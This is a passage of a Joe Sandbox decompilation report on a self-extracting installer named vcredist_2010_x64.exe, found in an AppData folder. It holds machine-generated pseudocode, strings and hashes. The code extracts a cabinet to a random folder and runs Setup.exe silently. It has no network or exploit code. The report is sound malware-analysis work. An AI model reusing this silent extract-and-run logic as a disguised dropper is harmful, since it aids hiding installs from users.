			E01005899() {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				struct _PROCESS_INFORMATION _v36;
				signed short _v54;
				char _v60;
				char _v72;
				struct _STARTUPINFOA _v140;
				void* _t41;
				signed int _t45;
				struct HWND__* _t47;
				intOrPtr _t49;
				long _t52;
				void* _t57;
				void* _t60;
				unsigned int _t63;
				signed int _t65;
				signed int _t66;
				long _t74;
				CHAR* _t75;
				void* _t76;
				unsigned int _t77;
				void* _t81;
				short _t82;
				signed int _t85;
				void* _t86;
				signed int _t94;
				signed int _t96;
				signed int _t97;
				long _t98;
				signed int _t99;
				long _t107;
				long _t110;
				void* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t118;
				void* _t120;
				char _t129;
				signed int _t130;
				signed int _t131;
				signed int _t133;
				int _t136;
				signed int _t138;
				void* _t140;
				void* _t143;
				CHAR* _t145;
				void* _t147;
				void* _t152;
				void* _t153;
				void* _t160;
				void* _t162;
				intOrPtr _t166;

				 *0x100d044 =  *0x100d044 | 0xffffffff;
				_t144 = 0x80000000;
				_v8 = 0;
				 *0x100cd00 = 0;
				 *0x100c8c8 = 0x80000000;
				InitializeCriticalSectionAndSpinCount(0x100d060, 0xffffffff);
				 *0x100c060 = 1;
				__imp__#17(_t143, _t153, _t120);
				 *0x100d078 = GetProcessHeap();
				E01002FB2();
				_t41 = CreateEventA(0, 1, 0, 0);
				 *0x100cf24 = _t41;
				if(_t41 != 0) {
					E0100400D();
					__eflags =  *0x100c054; // 0x0
					if(__eflags != 0) {
						L10:
						 *0x100cf2c = CreateEventA(0, 0, 0, 0);
						_t45 = CreateThread(0, 0, E01003941, 0, 0,  &_v20); // executed
						__eflags = _t45;
						if(_t45 != 0) {
							WaitForSingleObject( *0x100cf2c, 0xffffffff);
							_t47 =  *0x100ce04; // 0x303f8
							__eflags = _t47;
							if(_t47 != 0) {
								__eflags =  *0x100c4b4; // 0x1
								if(__eflags == 0) {
									SendDlgItemMessageA(_t47, 0x68, 0xc, 0,  *0x100c4b0);
									_t49 =  *0x100c014; // 0x55d640
									_t52 = _t49 + 0xffff >> 0x10 << 0x10;
									__eflags = _t52;
									SendDlgItemMessageA( *0x100ce04, 0x6a, 0x401, 0, _t52);
									SendDlgItemMessageA( *0x100ce04, 0x6a, 0x404, 1, 0);
								} else {
									Sleep(0x1f4); // executed
									ShowWindow( *0x100ce04, 0); // executed
									SetParent( *0x100ce04,  *0x100cf28);
								}
								__eflags =  *0x100c054; // 0x0
								if(__eflags != 0) {
									L21:
									E01004F6B(_t122, _t140, _t144);
									__eflags =  *0x100c054; // 0x0
									_t145 = 0x100d1a0;
									if(__eflags != 0) {
										L28:
										E01002BC4("c:\4863269369430a9b27", "_sfx_manifest_", _t145);
										_t57 = CreateFileA(_t145, 0x80000000, 1, 0, 3, 0x8000000, 0);
										__eflags = _t57 - 0xffffffff;
										_v12 = _t57;
										if(_t57 == 0xffffffff) {
											goto L6;
										}
										 *0x100c050 = GetFileSize(_t57, 0);
										_t60 = E01003BE7(_t58 + 1);
										__eflags = _t60;
										_pop(_t122);
										 *0x100c04c = _t60;
										if(_t60 != 0) {
											_t122 =  &_v16;
											_t97 = ReadFile(_v12, _t60,  *0x100c050,  &_v16, 0);
											__eflags = _t97;
											if(_t97 != 0) {
												_t98 =  *0x100c050; // 0x0
												__eflags = _v16 - _t98;
												if(_v16 == _t98) {
													_t122 =  *0x100c04c; // 0x4769e8
													 *0x100c048 = 1;
													 *((char*)(_t122 + _t98)) = 0;
												}
											}
										}
										CloseHandle(_v12);
										__eflags =  *0x100c048; // 0x1
										if(__eflags == 0) {
											goto L6;
										} else {
											DeleteFileA(_t145);
											L35:
											__eflags =  *0x100c048; // 0x1
											if(__eflags == 0) {
												L38:
												__eflags =  *0x100d07c; // 0x483270
												if(__eflags == 0) {
													L59:
													__eflags =  *0x101d3e0;
													if( *0x101d3e0 == 0) {
														ShowWindow( *0x100ce04, 0);
														LoadStringA( *0x100c05c, 0x20000002, _t145, 0x104);
														MessageBoxA( *0x100ce04, _t145, _t145, 0x10030);
													}
													L61:
													_t63 =  *0x100c8c8; // 0xc0000013
													__eflags = _t63;
													if(_t63 < 0) {
														goto L68;
													}
													__eflags = 0x40000000 & _t63;
													if(__eflags != 0) {
														L66:
														_push(0x20000007);
														goto L67;
													}
													_t65 = E01003972(_t63 >> 0x00000001 & 0x00000001, _t140, _t145, __eflags, _t63 & 0x00000001, _t63 >> 0x00000001 & 0x00000001, _t63 >> 0x00000004 & 0x00000001, 0x100c8d0,  *0x100c8cc);
													__eflags = _t65;
													_t66 =  *0x100c8c8; // 0xc0000013
													if(_t65 == 0) {
														_t66 = _t66 | 0x40000000;
														__eflags = _t66;
														 *0x100c8c8 = _t66;
													}
													__eflags = 0x40000000 & _t66;
													if((0x40000000 & _t66) == 0) {
														goto L68;
													} else {
														goto L66;
													}
												}
												__eflags =  *0x100c4ac; // 0x0
												if(__eflags != 0) {
													goto L59;
												}
												__eflags =  *0x100c4b4; // 0x1
												if(__eflags == 0) {
													SendDlgItemMessageA( *0x100ce04, 0x68, 0xc, 0,  *0x100ce0c);
												}
												SetEnvironmentVariableA("_SFX_CAB_EXE_PATH", "c:\4863269369430a9b27");
												SetEnvironmentVariableA("_SFX_CAB_EXE_PACKAGE", "C:\Users\jones\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe");
												SetEnvironmentVariableA("_SFX_CAB_EXE_PARAMETERS",  *0x100c4a8); // executed
												E010037BF(_t122);
												_t74 =  *0x100ce0c; // 0x10022bb
												__eflags =  *_t74;
												if( *_t74 != 0) {
													_t75 =  *0x100d07c; // 0x483270
													__eflags = 0x100d3e0;
													do {
														_t129 =  *_t75;
														_t75[0x100d3e0] = _t129;
														_t75 =  &(_t75[1]);
														__eflags = _t129;
													} while (_t129 != 0);
													_t76 =  *0x100c4a8; // 0x443437
													_t140 = _t76;
													do {
														_t130 =  *_t76;
														_t76 = _t76 + 1;
														__eflags = _t130;
													} while (_t130 != 0);
													_t77 = _t76 - _t140;
													_t147 = 0x100d3df;
													__eflags = 0x100d3e0;
													do {
														_t131 =  *(_t147 + 1);
														_t147 = _t147 + 1;
														__eflags = _t131;
													} while (_t131 != 0);
													_t133 = _t77 >> 2;
													_t160 = _t140;
													_t136 = memcpy(_t147, _t160, _t133 << 2) & 0x00000003;
													__eflags = _t136;
													memcpy(_t160 + _t133 + _t133, _t160, _t136);
													_t162 = _t162 + 0x18;
													goto L53;
												} else {
													_t94 = ExpandEnvironmentStringsA( *0x100d07c, "c:\4863269369430a9b27\Setup.exe   /q /norestart", 0x10000); // executed
													__eflags = _t94;
													_v8 = _t94;
													if(_t94 == 0) {
														goto L1;
													}
													__eflags = _t94 - 0x10000;
													if(_t94 < 0x10000) {
														L53:
														_t138 = 0x11;
														_t152 =  &_v140;
														_t81 = memset(_t152, 0, _t138 << 2);
														_t145 = _t152 + _t138;
														_t82 = _t81 + 1;
														_v140.dwFlags = _t82;
														_v140.wShowWindow = _t82;
														_v140.cb = 0x44;
														_t85 = CreateProcessA(0, "c:\4863269369430a9b27\Setup.exe   /q /norestart", 0, 0, 0, 0x20, 0,  *0x101d3e4,  &_v140,  &_v36); // executed
														__eflags = _t85;
														if(_t85 == 0) {
															goto L1;
														}
														__eflags =  *0x100c4b4; // 0x1
														if(__eflags == 0) {
															ShowWindow( *0x100ce04, 0);
														}
														_t86 = _v36.hProcess;
														 *0x100d04c = _t86;
														WaitForSingleObject(_t86, 0xffffffff);
														GetExitCodeProcess(_v36,  &_v8); // executed
														CloseHandle(_v36.hThread); // executed
														E01002821(0); // executed
														__eflags = _v8 - 0xcabf00d1;
														if(_v8 != 0xcabf00d1) {
															E01002D78();
														} else {
															_v8 = 0;
														}
														goto L61;
													}
													goto L1;
												}
											}
											__eflags =  *0x100c000; // 0x1
											if(__eflags == 0) {
												goto L38;
											}
											_t96 = E010046B9(_t122, _t140, _t145,  *0x100c04c);
											__eflags = _t96;
											if(_t96 == 0) {
												goto L6;
											}
											goto L38;
										}
									}
									__eflags =  *0x100c4b4; // 0x1
									if(__eflags == 0) {
										LoadStringA( *0x100c05c, 0x20000004, 0x100d1a0, 0x104);
										LoadStringA( *0x100c05c, 0x20000006, "C:\Users\jones\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe", 0x104);
										SendDlgItemMessageA( *0x100ce04, 0x65, 0xc, 0, 0x100d1a0);
										SendDlgItemMessageA( *0x100ce04, 0x66, 0xc, 0, "C:\Users\jones\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe");
										SendDlgItemMessageA( *0x100ce04, 0x69, 0xc, 0, "c:\4863269369430a9b27");
										SendDlgItemMessageA( *0x100ce04, 0x6a, 0x402, 0, 0);
										_t107 = (_v54 & 0x0000ffff) << 0x10;
										__eflags = _t107;
										SendDlgItemMessageA( *0x100ce04, 0x6a, 0x401, 0, _t107);
										ShowWindow( *0x100ce04, 5);
									}
									_t99 = E010076CB(__eflags, _v12, "C:\Users\jones\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe", L"", 0, 0x10055a3, 0, 0); // executed
									_t162 = _t162 + 0x1c;
									__eflags = _t99;
									if(_t99 == 0) {
										goto L6;
									} else {
										__eflags =  *0x101d3e0;
										if( *0x101d3e0 != 0) {
											L27:
											__eflags =  *0x100c054; // 0x0
											if(__eflags == 0) {
												goto L35;
											}
											goto L28;
										}
										__eflags =  *0x100ce04; // 0x303f8
										if(__eflags == 0) {
											goto L13;
										}
										goto L27;
									}
								} else {
									_push(0);
									_push(0);
									_t110 = E01003C0F("C:\Users\jones\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe"); // executed
									_t144 = _t110;
									_t112 = E010066A7(E01003BE7, E01002C2E, E01003C0F, E01003C58, E01003C87, E01002C4B, E01002C7C, 0,  &_v72);
									_t122 =  &_v60;
									_v12 = _t112;
									_t113 = E0100673E(_t112, _t110,  &_v60); // executed
									_t162 = _t162 + 0x3c;
									__eflags = _t113;
									if(_t113 == 0) {
										L6:
										_push(0x20000001);
										goto L67;
									}
									__eflags =  *0x100c4b4; // 0x1
									if(__eflags == 0) {
										ShowWindow( *0x100ce04, 0); // executed
									}
									goto L21;
								}
							}
							L13:
							_push(0x4c7);
							goto L67;
						} else {
							_push(8);
							L67:
							E01003892();
							L68:
							_t166 =  *0x100c060; // 0x0
							if(_t166 != 0) {
								DeleteCriticalSection(0x100d060);
								 *0x100c060 = 0;
							}
							ExitProcess(_v8);
						}
					}
					_t117 = E010027CB();
					__eflags = _t117;
					if(_t117 != 0) {
						_t118 =  *0x100c018; // 0xa400
						__eflags = (_t118 & 0xffff0000) - 0xcab00000;
						if((_t118 & 0xffff0000) != 0xcab00000) {
							__eflags =  *0x100c018 & 0x80000000;
							if(( *0x100c018 & 0x80000000) == 0) {
								 *0x100c4ac = 1;
							}
							 *0x100c01b =  *0x100c01b & 0x0000007f;
							__eflags =  *0x100c01b;
							goto L10;
						}
						goto L6;
					} else {
						_push(0x47e);
						goto L67;
					}
				}
				L1:
				_push(0xffffffff);
				goto L67;
			}

0x010058a4
0x010058b2
0x010058bc
0x010058bf
0x010058c5
0x010058cb
0x010058d4
0x010058da
0x010058e6
0x010058eb
0x010058fa
0x010058fe
0x01005903
0x0100590c
0x01005911
0x01005917
0x01005960
0x01005966
0x01005978
0x0100597e
0x01005980
0x01005991
0x01005997
0x0100599c
0x0100599e
0x010059aa
0x010059b6
0x010059f0
0x010059f2
0x010059ff
0x010059ff
0x01005a11
0x01005a23
0x010059b8
0x010059bd
0x010059ca
0x010059dc
0x010059dc
0x01005a25
0x01005a2b
0x01005a96
0x01005a96
0x01005a9b
0x01005aa1
0x01005aa6
0x01005b98
0x01005ba3
0x01005bb9
0x01005bbf
0x01005bc2
0x01005bc5
0x00000000
0x00000000
0x01005bd3
0x01005bda
0x01005bdf
0x01005be1
0x01005be2
0x01005be7
0x01005bea
0x01005bf8
0x01005bfe
0x01005c00
0x01005c02
0x01005c07
0x01005c0a
0x01005c0c
0x01005c12
0x01005c1c
0x01005c1c
0x01005c0a
0x01005c00
0x01005c22
0x01005c28
0x01005c2e
0x00000000
0x01005c34
0x01005c35
0x01005c3b
0x01005c3b
0x01005c41
0x01005c5e
0x01005c5e
0x01005c64
0x01005dd6
0x01005dd6
0x01005ddc
0x01005de5
0x01005dfc
0x01005e0f
0x01005e0f
0x01005e15
0x01005e15
0x01005e1a
0x01005e1c
0x00000000
0x00000000
0x01005e23
0x01005e25
0x01005e60
0x01005e60
0x00000000
0x01005e60
0x01005e47
0x01005e4c
0x01005e4e
0x01005e53
0x01005e55
0x01005e55
0x01005e57
0x01005e57
0x01005e5c
0x01005e5e
0x00000000
0x00000000
0x00000000
0x00000000
0x01005e5e
0x01005c6a
0x01005c70
0x00000000
0x00000000
0x01005c76
0x01005c7c
0x01005c8f
0x01005c8f
0x01005ca1
0x01005cad
0x01005cba
0x01005cbc
0x01005cc1
0x01005cc6
0x01005cc8
0x01005cf5
0x01005d01
0x01005d03
0x01005d03
0x01005d05
0x01005d08
0x01005d09
0x01005d09
0x01005d0d
0x01005d12
0x01005d14
0x01005d14
0x01005d16
0x01005d17
0x01005d17
0x01005d1b
0x01005d1d
0x01005d1d
0x01005d1e
0x01005d1e
0x01005d21
0x01005d22
0x01005d22
0x01005d28
0x01005d2b
0x01005d31
0x01005d31
0x01005d34
0x01005d34
0x00000000
0x01005cca
0x01005cdb
0x01005ce1
0x01005ce3
0x01005ce6
0x00000000
0x00000000
0x01005cec
0x01005cee
0x01005d36
0x01005d38
0x01005d3b
0x01005d41
0x01005d41
0x01005d43
0x01005d44
0x01005d47
0x01005d5c
0x01005d72
0x01005d78
0x01005d7a
0x00000000
0x00000000
0x01005d80
0x01005d86
0x01005d8f
0x01005d8f
0x01005d95
0x01005d9b
0x01005da0
0x01005dad
0x01005db6
0x01005dbc
0x01005dc1
0x01005dc8
0x01005dcf
0x01005dca
0x01005dca
0x01005dca
0x00000000
0x01005dc8
0x00000000
0x01005cf0
0x01005cc8
0x01005c43
0x01005c49
0x00000000
0x00000000
0x01005c51
0x01005c56
0x01005c58
0x00000000
0x00000000
0x00000000
0x01005c58
0x01005c2e
0x01005aac
0x01005ab2
0x01005ac9
0x01005ae4
0x01005af6
0x01005b08
0x01005b1a
0x01005b2b
0x01005b31
0x01005b31
0x01005b43
0x01005b4d
0x01005b4d
0x01005b68
0x01005b6d
0x01005b70
0x01005b72
0x00000000
0x01005b78
0x01005b78
0x01005b7e
0x01005b8c
0x01005b8c
0x01005b92
0x00000000
0x00000000
0x00000000
0x01005b92
0x01005b80
0x01005b86
0x00000000
0x00000000
0x00000000
0x01005b86
0x01005a2d
0x01005a2d
0x01005a2e
0x01005a34
0x01005a39
0x01005a63
0x01005a68
0x01005a6e
0x01005a71
0x01005a76
0x01005a79
0x01005a7b
0x0100593d
0x0100593d
0x00000000
0x0100593d
0x01005a81
0x01005a87
0x01005a90
0x01005a90
0x00000000
0x01005a87
0x01005a2b
0x010059a0
0x010059a0
0x00000000
0x01005982
0x01005982
0x01005e65
0x01005e65
0x01005e6a
0x01005e6a
0x01005e70
0x01005e77
0x01005e7d
0x01005e7d
0x01005e86
0x01005e86
0x01005980
0x01005919
0x0100591e
0x01005920
0x0100592c
0x01005936
0x0100593b
0x01005947
0x0100594d
0x0100594f
0x0100594f
0x01005959
0x01005959
0x00000000
0x01005959
0x00000000
0x01005922
0x01005922
0x00000000
0x01005922
0x01005920
0x01005905
0x01005905
0x00000000

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0100D060,000000FF), ref: 010058CB
#17.COMCTL32 ref: 010058DA
GetProcessHeap.KERNEL32 ref: 010058E0
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 010058FA
DeleteCriticalSection.KERNEL32(0100D060,20000001), ref: 01005E77
ExitProcess.KERNEL32 ref: 01005E86

Strings

_SFX_CAB_EXE_PARAMETERS, xrefs: 01005CB5
c:\4863269369430a9b27, xrefs: 01005B0A, 01005B9E, 01005C97
.exe, xrefs: 01005AA1, 01005ABD, 01005AEA, 01005B98, 01005BB8, 01005C34, 01005DF0, 01005E07, 01005E08
iG, xrefs: 01005BE2, 01005C0C
p2H, xrefs: 01005C5E, 01005CF5
_SFX_CAB_EXE_PACKAGE, xrefs: 01005CA8
74D, xrefs: 01005D0D
_sfx_manifest_, xrefs: 01005B99
D, xrefs: 01005D5C
c:\4863269369430a9b27\Setup.exe /q /norestart, xrefs: 01005CD0, 01005CFA, 01005D6C
_SFX_CAB_EXE_PATH, xrefs: 01005C9C
C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe, xrefs: 01005A2F, 01005B60, 01005CA3
C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe, xrefs: 01005AD4, 01005AF8

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: CriticalProcessSection$CountCreateDeleteEventExitHeapInitializeSpin
String ID: .exe$74D$C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe$D$_SFX_CAB_EXE_PACKAGE$_SFX_CAB_EXE_PARAMETERS$_SFX_CAB_EXE_PATH$_sfx_manifest_$c:\4863269369430a9b27$c:\4863269369430a9b27\Setup.exe /q /norestart$p2H$iG
API String ID: 2862019026-642197106
Opcode ID: c3a792d8c2075a35dd7e64b05d9c3b2f4654ac4543c79ca2ca3d8c026a3f3d64
Instruction ID: c7a1a7c6920ba9a6fd8a3830312b28b74cc00901af42d7916e2ca50266dc036a
Opcode Fuzzy Hash: c3a792d8c2075a35dd7e64b05d9c3b2f4654ac4543c79ca2ca3d8c026a3f3d64
Instruction Fuzzy Hash: 06E18070540245BFFB339BA49E89F6A3BA9F705754F1042AAF2C1A50D9DBBA4C40CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01004F6B Relevance: 82.9, APIs: 35, Strings: 12, Instructions: 646
timestringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E01004F6B(void* __ecx, struct HWND__* __edx, struct HWND__* __edi) {
				intOrPtr _v8;
				struct _SECURITY_DESCRIPTOR _v28;
				char _v60;
				char _v272;
				struct HWND__* _v276;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _ACL _v316;
				char _v1340;
				char _v1342;
				char _v1344;
				char _v1345;
				char _v1346;
				int _v1352;
				char _v1353;
				int _v1360;
				int _v1364;
				int _v1368;
				signed int _v1372;
				signed int _v1376;
				char* _v1380;
				int* _v1384;
				int _v1388;
				int _v1392;
				long* _v1396;
				long _v1400;
				long _v1404;
				void* _v1408;
				long _v1412;
				int _v1416;
				struct _SECURITY_DESCRIPTOR* _v1420;
				int _v1424;
				struct _FILETIME _v1432;
				long _v1436;
				struct _SYSTEMTIME _v1452;
				long* _v1460;
				char* _v1464;
				intOrPtr _v1476;
				void* __ebx;
				void* __esi;
				intOrPtr _t174;
				void* _t179;
				struct HWND__* _t181;
				char _t183;
				struct HWND__* _t186;
				intOrPtr _t187;
				int _t188;
				signed int _t189;
				signed int _t190;
				intOrPtr _t191;
				struct HWND__* _t192;
				void* _t193;
				void* _t200;
				long _t201;
				struct HWND__* _t205;
				void* _t206;
				struct HWND__* _t210;
				struct HWND__* _t212;
				struct HWND__* _t237;
				struct HWND__* _t238;
				struct HWND__* _t242;
				void* _t244;
				struct HWND__* _t253;
				int _t255;
				struct HWND__* _t257;
				struct HWND__* _t258;
				int _t260;
				struct HWND__* _t267;
				struct HWND__* _t268;
				struct HWND__* _t270;
				struct HWND__* _t276;
				signed int _t278;
				signed int _t279;
				struct HWND__* _t281;
				struct HWND__* _t283;
				struct HWND__* _t285;
				struct HWND__* _t287;
				struct HWND__* _t289;
				struct HWND__* _t292;
				signed char _t295;
				long _t296;
				char _t299;
				int _t300;
				struct HWND__* _t302;
				int _t309;
				struct HWND__* _t312;
				signed int _t324;
				struct HWND__* _t326;
				void* _t328;
				char* _t333;
				long* _t334;
				void* _t335;
				struct HWND__* _t339;
				signed int _t342;
				void* _t343;
				void* _t344;
				void* _t345;
				void* _t347;

				_t326 = __edi;
				_t323 = __edx;
				_t174 =  *0x100c028; // 0xb636
				_t347 =  *0x100d080; // 0x63
				_v8 = _t174;
				_v1344 = 0x5c3a63;
				_v1345 = 0x63;
				_v1346 = 0x63;
				_v1364 = 0;
				_v1360 = 0;
				_v1392 = 0;
				_v1388 = 0;
				_v1352 = 0;
				_v1368 = 0;
				_v1424 = 0xc;
				_v1420 =  &_v28;
				_v1416 = 0;
				_v1384 = 0;
				if(_t347 == 0) {
					L3:
					_t179 = E01003D02( &_v1408,  &_v1372,  &_v1380); // executed
					if(_t179 != 0) {
						_push(_t333);
						_push(_t326);
						_t181 = InitializeSecurityDescriptor( &_v28, 1);
						__eflags = _t181;
						if(_t181 != 0) {
							_t283 = InitializeAcl( &_v316, 0x100, 2);
							__eflags = _t283;
							if(_t283 != 0) {
								_t333 = AddAccessAllowedAce;
								_t326 = 0x10000000;
								_t285 = AddAccessAllowedAce( &_v316, 2, 0x10000000, _v1408);
								__eflags = _t285;
								if(_t285 != 0) {
									_t287 = AddAccessAllowedAce( &_v316, 2, 0x10000000, _v1372);
									__eflags = _t287;
									if(_t287 != 0) {
										_t289 = AddAccessAllowedAce( &_v316, 2, 0x10000000, _v1380);
										__eflags = _t289;
										if(_t289 != 0) {
											_t292 = SetSecurityDescriptorDacl( &_v28, 1,  &_v316, 0);
											__eflags = _t292;
											if(_t292 != 0) {
												_v1384 =  &_v1424;
											}
										}
									}
								}
							}
						}
						__eflags =  *0x101d3e0;
						if( *0x101d3e0 != 0) {
							L15:
							GetSystemDirectoryA("c:\4863269369430a9b27\Setup.exe   /q /norestart", 0xffff);
							_t295 =  *0x100d3e0; // 0x63
							_v1376 = _v1376 & 0x00000000;
							_v1372 = _v1372 & 0x00000000;
							_t296 = _t295 | 0x00000020; // executed
							__eflags = _t296;
							_t183 = E010029C2(_t326); // executed
							_t299 = 0x61;
							_v1353 = _t183;
							_v1344 = 0x61;
							do {
								__eflags = _t299 - _v1353;
								if(_t299 != _v1353) {
									_t39 =  &_v1344; // 0x5c3a63
									_v1342 = 0;
									_t186 = QueryDosDeviceA(_t39,  &_v1340, 0x400); // executed
									__eflags = _t186;
									_v1342 = 0x5c;
									if(_t186 == 0) {
										L34:
										_t74 =  &_v1344; // 0x5c3a63
										_t299 =  *_t74;
									} else {
										_strlwr( &_v1340);
										_v1464 = "harddisk";
										_t267 = strstr( &_v1340, ??);
										__eflags = _t267;
										if(_t267 != 0) {
											L20:
											_t45 =  &_v1344; // 0x5c3a63, executed
											_t268 = E01002B13(_t326,  *_t45); // executed
											_t326 = _t268;
											__eflags = _t326;
											if(_t326 == 0) {
												goto L34;
											} else {
												_t270 = E010028D9(_t326,  &_v1344); // executed
												__eflags = _t270;
												if(_t270 == 0) {
													goto L34;
												} else {
													_t276 = GetDiskFreeSpaceA( &_v1344,  &_v1400,  &_v1412,  &_v1404,  &_v1436); // executed
													__eflags = _t276;
													if(_t276 == 0) {
														goto L34;
													} else {
														_t278 = _v1400 * _v1412;
														_t323 = _t278 * _v1404 >> 0x20;
														_t279 = _t278 * _v1404;
														_t299 = _v1344;
														__eflags = _t299 - _t296;
														_v1368 = 1;
														_t342 = _t278 * _v1404 >> 0x20;
														if(_t299 != _t296) {
															__eflags = _t326 - 2;
															if(_t326 != 2) {
																L30:
																__eflags = _t342 - _v1360;
																if(__eflags >= 0) {
																	if(__eflags > 0) {
																		L33:
																		_v1364 = _t279;
																		_v1360 = _t342;
																		_v1345 = _t299;
																	} else {
																		__eflags = _t279 - _v1364;
																		if(_t279 > _v1364) {
																			goto L33;
																		}
																	}
																}
															} else {
																__eflags = _t342 - _v1388;
																if(__eflags < 0) {
																	goto L30;
																} else {
																	if(__eflags > 0) {
																		L29:
																		_v1392 = _t279;
																		_v1388 = _t342;
																		_v1346 = _t299;
																	} else {
																		__eflags = _t279 - _v1392;
																		if(_t279 <= _v1392) {
																			goto L30;
																		} else {
																			goto L29;
																		}
																	}
																}
															}
														} else {
															_v1376 = _t279;
															_v1372 = _t342;
														}
													}
												}
											}
										} else {
											_t281 = strstr( &_v1340, "ramdisk");
											__eflags = _t281;
											if(_t281 == 0) {
												goto L34;
											} else {
												goto L20;
											}
										}
									}
								}
								_t299 = _t299 + 1;
								__eflags = _t299 - 0x7a;
								_v1344 = _t299;
							} while (_t299 <= 0x7a);
							_t333 = 0;
							__eflags = _v1368;
							if(_v1368 != 0) {
								_t187 =  *0x100c01c; // 0xcab00eee
								__eflags = _t187 - 0xcab00eee;
								if(_t187 == 0xcab00eee) {
									L42:
									_t188 = _v1372;
									__eflags = _v1360 - _t188;
									if(__eflags > 0) {
										goto L46;
									} else {
										if(__eflags < 0) {
											L45:
											_t300 = _v1376;
											_v1360 = _t188;
										} else {
											__eflags = _v1364 - _v1376;
											if(_v1364 >= _v1376) {
												goto L46;
											} else {
												goto L45;
											}
										}
									}
								} else {
									__eflags = _v1360;
									if(__eflags > 0) {
										L46:
										_t85 =  &_v1345; // 0x63
										_t296 =  *_t85;
										_t300 = _v1364;
									} else {
										if(__eflags < 0) {
											goto L42;
										} else {
											__eflags = _v1364 - _t187;
											if(_v1364 >= _t187) {
												goto L46;
											} else {
												goto L42;
											}
										}
									}
								}
								_t189 =  *0x100c014; // 0x55d640
								_t324 = 3;
								_t323 = _t189 * _t324 >> 0x20;
								_t190 = _t189 * _t324;
								__eflags = _v1360 - _t323;
								if(__eflags < 0) {
									L51:
									__eflags = _v1388 - _t323;
									if(__eflags < 0) {
										L92:
										_push(0x20000009);
										goto L93;
									} else {
										if(__eflags > 0) {
											L54:
											_t95 =  &_v1346; // 0x63
											_v1344 =  *_t95;
											goto L55;
										} else {
											__eflags = _v1392 - _t190;
											if(_v1392 < _t190) {
												goto L92;
											} else {
												goto L54;
											}
										}
									}
								} else {
									if(__eflags > 0) {
										L50:
										_v1344 = _t296;
										L55:
										_t242 = CryptAcquireContextA( &_v1396, _t333, _t333, 1, 0xf0000000); // executed
										__eflags = _t242;
										if(_t242 == 0) {
											L69:
											_t333 = 0x100d080;
											_t123 =  &_v1344; // 0x5c3a63
											_t244 = E01002BC4(_t123, "temp\\ext", 0x100d080);
											GetSystemTime( &_v1452);
											SystemTimeToFileTime( &_v1452,  &_v1432);
											E01002CAE(_t323, _t244, _v1432.dwLowDateTime *  *0x100c014 & 0x0000ffff, _t244);
											_t326 = 1;
											_t253 = E010045EB(1, 0x100d080, _v1384, 1);
											__eflags = _t253;
											if(_t253 != 0) {
												_v1352 = 1;
												goto L72;
											} else {
												goto L70;
											}
										} else {
											_t326 = sprintf;
											_v1372 = _t333;
											_v1368 = _t333;
											_t296 = 0x100d080;
											do {
												_t257 = CryptGenRandom(_v1396, 0x10,  &_v60);
												__eflags = _t257;
												if(_t257 != 0) {
													_t102 =  &_v1344; // 0x5c3a63
													_t260 = sprintf(_t296, "%s", _t102);
													_t345 = _t345 + 0xc;
													_t333 = 0;
													__eflags = 0;
													_v1360 = 9;
													if(0 != 0) {
														_t105 = _t260 + 0x100d080; // 0x345c3a63
														_v1380 = _t105;
														do {
															sprintf(_v1380, "%02x",  *(_t343 + _t333 - 0x38) & 0x000000ff);
															_v1380 =  &(_v1380[2]);
															_t345 = _t345 + 0xc;
															_t333 =  &(_t333[1]);
															__eflags = _t333 - _v1360;
														} while (_t333 < _v1360);
													}
												}
												__eflags =  *0x100d080;
												if( *0x100d080 == 0) {
													_v1372 = 1;
												} else {
													_t333 = 1;
													_t258 = E010045EB(_t326, _t296, _v1384, 1); // executed
													__eflags = _t258;
													if(_t258 != 0) {
														_v1352 = 1;
													}
												}
												_v1368 = _v1368 + 1;
												__eflags = _v1352;
												if(_v1352 == 0) {
													__eflags = _v1372;
													if(_v1372 == 0) {
														goto L67;
													}
												}
												break;
												L67:
												__eflags = _v1368 - 0x2710;
											} while (_v1368 < 0x2710);
											_t253 = CryptReleaseContext(_v1396, 0);
											__eflags = _v1352;
											if(_v1352 != 0) {
												goto L72;
											} else {
												goto L69;
											}
										}
									} else {
										__eflags = _t300 - _t190;
										if(_t300 < _t190) {
											goto L51;
										} else {
											goto L50;
										}
									}
								}
							} else {
								_push(0x20000008);
								goto L93;
							}
						} else {
							__eflags =  *0x100c4ac; // 0x0
							if(__eflags == 0) {
								goto L15;
							} else {
								_t253 = GetCurrentDirectoryA(0x104, "c:\4863269369430a9b27");
								L72:
								_t296 = 0;
								__eflags =  *0x101d3e0;
								if( *0x101d3e0 != 0) {
									L89:
									__eflags = _v1352 - _t296;
									if(_v1352 != _t296) {
										goto L86;
									} else {
										_t253 = E010045EB(_t326, "c:\4863269369430a9b27", _v1384, 1);
										__eflags = _t253;
										if(_t253 != 0) {
											goto L86;
										} else {
											goto L70;
										}
									}
								} else {
									__eflags =  *0x100c4ac - _t296; // 0x0
									if(__eflags == 0) {
										goto L89;
									} else {
										_t326 = 0x100d080;
										while(1) {
											_t255 = DialogBoxParamA( *0x100c05c, 0x6b,  *0x100ce04, E01003E7A, _t296);
											__eflags = _t255 - 0xffffffff;
											if(_t255 == 0xffffffff) {
